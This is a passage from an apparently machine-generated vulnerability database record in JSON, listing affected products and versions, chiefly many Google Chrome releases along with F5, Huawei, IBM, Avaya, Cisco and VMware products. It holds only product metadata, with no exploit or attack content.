"eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.124" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.922.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.21" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.910.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1686.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.671.0" }, { "model": "bsc6000 v900r008c15", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.66" }, { "model": "oceanstor s2600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.68" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.424.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.39" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.898.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.478.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.540.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.57" }, { "model": "system storage san384b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-192" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "67000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.46" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1004.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.821.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.1" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.492.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.33" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.948.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.114" }, { "model": "rack server rh2288h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1024.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.784.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.48" }, { "model": "oceanstor css v100r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.30" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.44" }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.80" }, { "model": "system storage san06b-r 2498-r06", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.16" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.16" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.90" }, { "model": "fusionmanager v100r003c10cp6001", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified presence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.2" }, { "model": "secureplatform r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.92" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.683.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.425.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.486.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.747.0" }, { "model": "oceanstor vis6600t v200r003c10spc100", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.333" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.9" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.2" }, { "model": "studio beta", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storefabric b-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.17" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.42" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mxe series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1028" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.33" }, { "model": "vcloud automation center", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.773.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.26" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "oceanstor s5800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.10" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.739.0" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.19" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.27" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491059" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "ios-xe for csr1000v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.159.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18" }, { "model": "oceanstor sns5120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1028.0" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1013" }, { "model": "espace vcn3000 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.0" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "e9000 chassis v100r001c00spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vcenter server appliance update b", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.0" }, { "model": "cloud services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.16" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.660.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.41" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.1" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.0" }, { "model": "usc invicta series autosupport portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.321.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.14" }, { "model": "secureplatform r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.48" }, { "model": "nexus switch for nexus series 5.0 u1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v3000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.62" }, { "model": "fusionaccess v100r005c10spc203", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.861.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.524.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.717.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.880.0" }, { "model": "oceanstor s2600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.607.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.471.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.61" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.59" }, { "model": "gaia embedded r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.37" }, { "model": "oceanstor cse v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.232" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.58" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.778.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.74" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.03" }, { "model": "protectier entry edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "horizon daas platform", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.655.0" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.579.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.0" }, { "model": "oceanstor s5600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.694.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.669.0" }, { "model": "ds8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.97" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "chrome", 